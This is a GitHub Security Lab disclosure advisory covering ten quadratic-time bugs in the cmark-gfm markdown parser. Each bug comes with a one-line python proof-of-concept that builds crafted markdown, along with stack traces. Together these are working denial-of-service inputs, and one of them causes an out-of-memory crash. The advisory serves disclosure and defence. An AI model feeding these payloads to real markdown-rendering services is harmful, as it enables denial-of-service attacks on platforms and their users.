Coordinated Disclosure Timeline

Summary

A crafted markdown document can trigger a quadratic complexity algorithm in cmark-gfm. Since cmark-gfm is used for rendering markdown on https://github.com/, this vulnerability could be used in a denial-of-service attack on GitHub.

Product

cmark-gfm

Tested Version

0.29.0.gfm.6

Details

Issue 1: Quadratic behavior in handle_pointy_brace (GHSL-2022-088)

A markdown document containing a large number of repetitions of the characters <?x can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("-1" + "<?x"* 100000 + "y")' | cmark-gfm

Increasing the number 100000 in the above command causes the running time to increase quadratically.

This is a sample stack trace from the quadratic algorithm:

  1. _scan_html_tag (p=0x7ffff7bd111d "?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x<?x"...) at src/scanners.c:3839
  2. 0x00007ffff7f6b15f in _scan_at (scanner=0x7ffff7f710b7 <_scan_html_tag>, c=0x7fffffffcb78, offset=7467) at src/scanners.c:17
  3. 0x00007ffff7f6900a in handle_pointy_brace (subj=0x7fffffffcb70, options=141316) at src/inlines.c:902
  4. 0x00007ffff7f6a3f1 in parse_inline (parser=0x55555555b910, subj=0x7fffffffcb70, parent=0x55555555cf10, options=141316) at src/inlines.c:1404
  5. 0x00007ffff7f6a7e3 in cmark_parse_inlines (parser=0x55555555b910, parent=0x55555555cf10, refmap=0x55555555bc30, options=141316) at src/inlines.c:1470
  6. 0x00007ffff7f6372f in process_inlines (parser=0x55555555b910, refmap=0x55555555bc30, options=141316) at src/blocks.c:440
  7. 0x00007ffff7f63fc7 in finalize_document (parser=0x55555555b910) at src/blocks.c:642
  8. 0x00007ffff7f6642f in cmark_parser_finish (parser=0x55555555b910) at src/blocks.c:1507
  9. 0x000055555555754f in main (argc=15, argv=0x7fffffffdf48) at src/main.c:303

Impact

This issue could be used in a denial-of-service attack on GitHub.

Issue 2: Quadratic behavior in try_opening_table_header (GHSL-2022-089)

A markdown document containing a large number of repetitions of the characters |-\nt>|-\n can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("|-\nt>|-\n"* 10000)' | ./src/cmark-gfm -e table

Increasing the number 10000 in the above command causes the running time to increase quadratically.

This is a sample stack trace from the quadratic algorithm:

  1. 0x00007ffff7fb14f8 in row_from_string (self=0x55555555b2c0, parser=0x55555555b8e0, string=0x55555555d110 "|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n"..., len=26968) at extensions/table.c:182
  2. 0x00007ffff7fb17c6 in try_opening_table_header (self=0x55555555b2c0, parser=0x55555555b8e0, parent_container=0x55555555ce40, input=0x55555555b980 "|-\n", len=3) at extensions/table.c:264
  3. 0x00007ffff7fb1f7d in try_opening_table_block (self=0x55555555b2c0, indented=0, parser=0x55555555b8e0, parent_container=0x55555555ce40, input=0x55555555b980 "|-\n", len=3) at extensions/table.c:416
  4. 0x00007ffff7f65bcd in open_new_blocks (parser=0x55555555b8e0, container=0x7fffffffcda8, input=0x7fffffffcdc0, all_matched=true) at src/blocks.c:1286
  5. 0x00007ffff7f662f8 in S_process_line (parser=0x55555555b8e0, buffer=0x7fffffffd828 "|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n"..., bytes=2) at src/blocks.c:1476
  6. 0x00007ffff7f6438f in S_parser_feed (parser=0x55555555b8e0, buffer=0x7fffffffd828 "|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n"..., len=4096, eof=false) at src/blocks.c:730
  7. 0x00007ffff7f64182 in cmark_parser_feed (parser=0x55555555b8e0, buffer=0x7fffffffced0 "|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n|-\nt>|-\n"..., len=4096) at src/blocks.c:680
  8. 0x0000555555557465 in main (argc=4, argv=0x7fffffffdff8) at src/main.c:278

Impact

This issue could be used in a denial-of-service attack on GitHub.

Issue 3: Quadratic behavior in process_emphasis

A markdown document containing a large number of interleaved _ and * formatting can trigger quadratic behavior.

Proof of concept:

python3 -c "n=40000; print('*t '*n + '_t*_ '*n)" | cmark-gfm

Increasing the number 40000 in the above command causes the running time to increase quadratically.

This is an sample stack trace from the quadratic algorithm:

  1. process_emphasis (parser=0x55555555b8e0, subj=0x7fffffffd010, stack_bottom=0x0) at src/inlines.c:674
  2. 0x00007ffff7f6a805 in cmark_parse_inlines (parser=0x55555555b8e0, parent=0x55555555ce20, refmap=0x55555555bc00, options=0) at src/inlines.c:1473
  3. 0x00007ffff7f6372f in process_inlines (parser=0x55555555b8e0, refmap=0x55555555bc00, options=0) at src/blocks.c:440
  4. 0x00007ffff7f63fc7 in finalize_document (parser=0x55555555b8e0) at src/blocks.c:642
  5. 0x00007ffff7f6642f in cmark_parser_finish (parser=0x55555555b8e0) at src/blocks.c:1507
  6. 0x000055555555754f in main (argc=2, argv=0x7fffffffe3e8) at src/main.c:303

Impact

This issue could be used in a denial-of-service attack on GitHub.

Issue 4: Quadratic behavior in parse_extension_block (GHSL-2022-091)

A markdown document containing a large number of repetitions of the character | can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("x\n| - |\n" + "|"* 65535 + "y")' | ./src/cmark-gfm -e table

The running time is quadratic in the number of | characters. However, the worst case is 65535 due to this integer overflow check:

https://github.com/github/cmark-gfm/blob/9d57d8a23142b316282bdfc954cb0ecda40a8655/extensions/table.c#L165-L170

The running time for 65535 is quite slow (16.5 seconds on my laptop), but, thanks to this overflow check, it doesn’t get any worse if you increase the number of | characters to 65536 or more.

This is a sample stack trace from the quadratic algorithm:

  1. 0x00007ffff7f8faec in cmark_llist_append (mem=0x7ffff7fac370 <CMARK_DEFAULT_MEM_ALLOCATOR>, head=0x55555555cf50, data=0x5555558be520) at src/linked_list.c:15
  2. 0x00007ffff7fb14b1 in row_from_string (self=0x55555555b2c0, parser=0x55555555b8e0, string=0x55555556f270 '|' <repeats 200 times>..., len=65537) at extensions/table.c:172
  3. 0x00007ffff7fb203c in matches (self=0x55555555b2c0, parser=0x55555555b8e0, input=0x55555556f270 '|' <repeats 200 times>..., len=65537, parent_container=0x55555555ce40) at extensions/table.c:431
  4. 0x00007ffff7f64d1d in parse_extension_block (parser=0x55555555b8e0, container=0x55555555ce40, input=0x7fffffffcd80) at src/blocks.c:1014
  5. 0x00007ffff7f64dc0 in check_open_blocks (parser=0x55555555b8e0, input=0x7fffffffcd80, all_matched=0x7fffffffcd67) at src/blocks.c:1044
  6. 0x00007ffff7f662be in S_process_line (parser=0x55555555b8e0, buffer=0x55555555d270 '|' <repeats 200 times>..., bytes=65536) at src/blocks.c:1467
  7. 0x00007ffff7f64364 in S_parser_feed (parser=0x55555555b8e0, buffer=0x7fffffffce90 "|||||||y\n", '|' <repeats 191 times>..., len=9, eof=false) at src/blocks.c:727
  8. 0x00007ffff7f64182 in cmark_parser_feed (parser=0x55555555b8e0, buffer=0x7fffffffce90 "|||||||y\n", '|' <repeats 191 times>..., len=9) at src/blocks.c:680
  9. 0x0000555555557465 in main (argc=4, argv=0x7fffffffdfb8) at src/main.c:278

Impact

This issue could be used in a denial-of-service attack on GitHub.

Issue 5: Quadratic behavior in www_match (GHSL-2022-099)

A markdown document containing a large number of repetitions of the characters z_www. can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("z_www." * 10000)' | ./src/cmark-gfm -e autolink

Increasing the number 10000 in the above command causes the running time to increase quadratically.

This is sample stack trace from the quadratic algorithm:

  1. check_domain (data=0x7ffff7c85714 "www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_www.z_ww"..., size=118204, allow_short=0) at extensions/autolink.c:121
  2. 0x00007ffff7fb43d3 in www_match (parser=0x55555555b8e0, parent=0x55555555ce60, inline_parser=0x7fffffffcbe0) at extensions/autolink.c:163
  3. 0x00007ffff7fb48c7 in match (ext=0x55555555b4e0, parser=0x55555555b8e0, parent=0x55555555ce60, c=119 'w', inline_parser=0x7fffffffcbe0) at extensions/autolink.c:263
  4. 0x00007ffff7f6a2d6 in try_extensions (parser=0x55555555b8e0, parent=0x55555555ce60, c=119 'w', subj=0x7fffffffcbe0) at src/inlines.c:1369
  5. 0x00007ffff7f6a5ef in parse_inline (parser=0x55555555b8e0, subj=0x7fffffffcbe0, parent=0x55555555ce60, options=0) at src/inlines.c:1437
  6. 0x00007ffff7f6a7e3 in cmark_parse_inlines (parser=0x55555555b8e0, parent=0x55555555ce60, refmap=0x55555555bc00, options=0) at src/inlines.c:1470
  7. 0x00007ffff7f6372f in process_inlines (parser=0x55555555b8e0, refmap=0x55555555bc00, options=0) at src/blocks.c:440
  8. 0x00007ffff7f63fc7 in finalize_document (parser=0x55555555b8e0) at src/blocks.c:642
  9. 0x00007ffff7f6642f in cmark_parser_finish (parser=0x55555555b8e0) at src/blocks.c:1507
  10. 0x000055555555754f in main (argc=4, argv=0x7fffffffdfb8) at src/main.c:303

Impact

This issue could be used in a denial-of-service attack on GitHub.

A markdown document containing a large number of repetitions of the characters [f]\n can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("[f]:u\n\"\n" + "[f]\n" * 80000 + "[f]:u \"t\n")' | ./src/cmark-gfm

Increasing the number 80000 in the above command causes the running time to increase quadratically. It also causes a large amount of memory allocation, eventually leading to a crash.

This is sample stack trace from the crash (caused by an out-of-memory error):

  1. __pthread_kill_implementation (no_tid=0, signo=6, threadid=140737351010112) at ./nptl/pthread_kill.c:44
  2. __pthread_kill_internal (signo=6, threadid=140737351010112) at ./nptl/pthread_kill.c:78
  3. __GI___pthread_kill (threadid=140737351010112, signo=signo@entry=6) at ./nptl/pthread_kill.c:89
  4. 0x00007ffff7d49476 in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
  5. 0x00007ffff7d2f7f3 in __GI_abort () at ./stdlib/abort.c:79
  6. 0x00007ffff7f85e35 in cmark_strbuf_grow (buf=0x7fffffffcd00, target_size=1150863842) at src/buffer.c:48
  7. 0x00007ffff7f85dad in S_strbuf_grow_by (buf=0x7fffffffcd00, add=320007) at src/buffer.c:35
  8. 0x00007ffff7f860c1 in cmark_strbuf_put (buf=0x7fffffffcd00, data=0x7fffb2680010 "\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]"..., len=320007) at src/buffer.c:112
  9. 0x00007ffff7f8ed27 in houdini_escape_html0 (ob=0x7fffffffcd00, src=0x7fffb2680010 "\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]"..., size=320007, secure=0) at src/houdini_html_e.c:45
  10. 0x00007ffff7f8920d in escape_html (dest=0x7fffffffcd00, source=0x7fffb2680010 "\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]\n[f]"..., length=320007) at src/html.c:18
  11. 0x00007ffff7f8a55b in S_render_node (renderer=0x7fffffffcd20, node=0x555555748190, ev_type=CMARK_EVENT_ENTER, options=133124) at src/html.c:378
  12. 0x00007ffff7f8aad5 in cmark_render_html_with_mem (root=0x55555555bb30, options=133124, extensions=0x0, mem=0x7ffff7fac370 <CMARK_DEFAULT_MEM_ALLOCATOR>) at src/html.c:473
  13. 0x00005555555566c8 in print_document (document=0x55555555bb30, writer=FORMAT_HTML, options=133124, width=0, parser=0x55555555b900) at src/main.c:79
  14. 0x000055555555758b in main (argc=13, argv=0x7fffffffdf28) at src/main.c:305

Impact

This issue could be used in a denial-of-service attack on GitHub.

A markdown document containing the string www. followed by a large number of repetitions of the ) character can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("www." + ")" * 80000)' | ./src/cmark-gfm -e autolink

Increasing the number 80000 in the above command causes the running time to increase quadratically.

This is sample stack trace from the quadratic algorithm:

  1. autolink_delim (data=0x555555593c90 "www.", ')' <repeats 196 times>..., link_end=70497) at extensions/autolink.c:99
  2. 0x00007ffff7fb4426 in www_match (parser=0x55555555b900, parent=0x555555593be0, inline_parser=0x7fffffffcb50) at extensions/autolink.c:171
  3. 0x00007ffff7fb48c7 in match (ext=0x55555555b4e0, parser=0x55555555b900, parent=0x555555593be0, c=119 'w', inline_parser=0x7fffffffcb50) at extensions/autolink.c:263
  4. 0x00007ffff7f6a2d6 in try_extensions (parser=0x55555555b900, parent=0x555555593be0, c=119 'w', subj=0x7fffffffcb50) at src/inlines.c:1369
  5. 0x00007ffff7f6a5ef in parse_inline (parser=0x55555555b900, subj=0x7fffffffcb50, parent=0x555555593be0, options=133124) at src/inlines.c:1437
  6. 0x00007ffff7f6a7e3 in cmark_parse_inlines (parser=0x55555555b900, parent=0x555555593be0, refmap=0x55555555bc20, options=133124) at src/inlines.c:1470
  7. 0x00007ffff7f6372f in process_inlines (parser=0x55555555b900, refmap=0x55555555bc20, options=133124) at src/blocks.c:440
  8. 0x00007ffff7f63fc7 in finalize_document (parser=0x55555555b900) at src/blocks.c:642
  9. 0x00007ffff7f6642f in cmark_parser_finish (parser=0x55555555b900) at src/blocks.c:1507
  10. 0x000055555555754f in main (argc=13, argv=0x7fffffffdf28) at src/main.c:303

Impact

This issue could be used in a denial-of-service attack on GitHub.

Issue 8: quadratic behavior in row_from_string (GHSL-2022-111)

A markdown document containing a large number of repetitions of the characters :\n can trigger quadratic behavior.

Proof of concept:

python3 -c 'print(":-\n" + ":\n" * 80000 + ":-\n")' | ./src/cmark-gfm -e table

Increasing the number 80000 in the above command causes the running time to increase quadratically.

This is sample stack trace from the quadratic algorithm:

  1. 0x00007ffff7fb1457 in row_from_string (self=0x55555555b2c0, parser=0x55555555b900, string=0x7ffff7cab010 ":-\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:"..., len=160003) at extensions/table.c:160
  2. 0x00007ffff7fb17c6 in try_opening_table_header (self=0x55555555b2c0, parser=0x55555555b900, parent_container=0x55555555cf00, input=0x55555555b9a0 ":-\n", len=3) at extensions/table.c:264
  3. 0x00007ffff7fb1f7d in try_opening_table_block (self=0x55555555b2c0, indented=0, parser=0x55555555b900, parent_container=0x55555555cf00, input=0x55555555b9a0 ":-\n", len=3) at extensions/table.c:416
  4. 0x00007ffff7f65bcd in open_new_blocks (parser=0x55555555b900, container=0x7fffffffccd8, input=0x7fffffffccf0, all_matched=true) at src/blocks.c:1286
  5. 0x00007ffff7f662f8 in S_process_line (parser=0x55555555b900, buffer=0x7fffffffcf03 ":-\n\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n"..., bytes=2) at src/blocks.c:1476
  6. 0x00007ffff7f6438f in S_parser_feed (parser=0x55555555b900, buffer=0x7fffffffcf03 ":-\n\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n"..., len=263, eof=false) at src/blocks.c:730
  7. 0x00007ffff7f64182 in cmark_parser_feed (parser=0x55555555b900, buffer=0x7fffffffce00 "\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:\n:"..., len=263) at src/blocks.c:680
  8. 0x0000555555557465 in main (argc=13, argv=0x7fffffffdf28) at src/main.c:278

Impact

This issue could be used in a denial-of-service attack on GitHub.

Issue 9: Quadratic behavior in url_match (GHSL-2022-120)

A markdown document containing a large number of repetitions of the characters <http://s can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("<http://s" * 20000)' | time ./src/cmark-gfm -e autolink

Increasing the number 20000 in the above command causes the running time to increase quadratically.

This is a sample stack trace from the quadratic algorithm:

  1. cmark_isspace (c=58 ':') at src/cmark_ctype.c:29
  2. 0x00007ffff7fb4739 in url_match (parser=0x55555555b900, parent=0x55555555cf00, inline_parser=0x7fffffffcb50) at extensions/autolink.c:228
  3. 0x00007ffff7fb48a8 in match (ext=0x55555555b4e0, parser=0x55555555b900, parent=0x55555555cf00, c=58 ':', inline_parser=0x7fffffffcb50) at extensions/autolink.c:260
  4. 0x00007ffff7f6a2d6 in try_extensions (parser=0x55555555b900, parent=0x55555555cf00, c=58 ':', subj=0x7fffffffcb50) at src/inlines.c:1369
  5. 0x00007ffff7f6a5ef in parse_inline (parser=0x55555555b900, subj=0x7fffffffcb50, parent=0x55555555cf00, options=133124) at src/inlines.c:1437
  6. 0x00007ffff7f6a7e3 in cmark_parse_inlines (parser=0x55555555b900, parent=0x55555555cf00, refmap=0x55555555bc20, options=133124) at src/inlines.c:1470
  7. 0x00007ffff7f6372f in process_inlines (parser=0x55555555b900, refmap=0x55555555bc20, options=133124) at src/blocks.c:440
  8. 0x00007ffff7f63fc7 in finalize_document (parser=0x55555555b900) at src/blocks.c:642
  9. 0x00007ffff7f6642f in cmark_parser_finish (parser=0x55555555b900) at src/blocks.c:1507
  10. 0x000055555555754f in main (argc=13, argv=0x7fffffffdf28) at src/main.c:303

Impact

This issue could be used in a denial-of-service attack on GitHub.

Issue 10: Quadratic behavior in process_emphasis when handling the strikethrough extension (GHSL-2022-126)

A markdown document containing a large number of repetitions of the characters ,z~~ can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("~e" + ",z~~" * 20000)' | ./src/cmark-gfm -e strikethrough

Increasing the number 20000 in the above command causes the running time to increase quadratically.

This is a sample stack trace from the quadratic algorithm:

  1. process_emphasis (parser=0x55555555b900, subj=0x7fffffffcb50, stack_bottom=0x0) at src/inlines.c:672
  2. 0x00007ffff7f6a805 in cmark_parse_inlines (parser=0x55555555b900, parent=0x55555555cf00, refmap=0x55555555bc20, options=133124) at src/inlines.c:1473
  3. 0x00007ffff7f6372f in process_inlines (parser=0x55555555b900, refmap=0x55555555bc20, options=133124) at src/blocks.c:440
  4. 0x00007ffff7f63fc7 in finalize_document (parser=0x55555555b900) at src/blocks.c:642
  5. 0x00007ffff7f6642f in cmark_parser_finish (parser=0x55555555b900) at src/blocks.c:1507
  6. 0x000055555555754f in main (argc=13, argv=0x7fffffffdf28) at src/main.c:303

The quadratic behavior is caused by the inner loop at inlines.c, lines 672-685, which searches backwards for the opening delimiter corresponding to the current closing delimiter:

while (opener != NULL && opener != stack_bottom &&
       opener != openers_bottom[closer->length % 3][closer->delim_char]) {
  if (opener->can_open && opener->delim_char == closer->delim_char) {
    // interior closer of size 2 can't match opener of size 1
    // or of size 1 can't match 2
    if (!(closer->can_open || opener->can_close) ||
              closer->length % 3 == 0 ||
        (opener->length + closer->length) % 3 != 0) {
      opener_found = true;
      break;
    }
  }
  opener = opener->previous;
}

The proof-of-concept (above) starts with a single ~ character, which gets classified as an opener because it is immediately followed by the letter e. The double ~~ characters, on the other hand, get classified as closers because they are immediately followed by a punctuation character (,). However, the ~ opener does not match the ~~ closer because they don’t have the same number of ~ characters. As a result, the opener found by this loop is rejected, causing the same search to be repeated on the next iteration of the outer loop.

Impact

This issue could be used in a denial-of-service attack on GitHub.

CVE

Credit

These issues were discovered and reported by GHSL team members @kevinbackhouse (Kevin Backhouse) and @philipturnbull (Phil Turnbull).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-088 in any communication regarding this issue.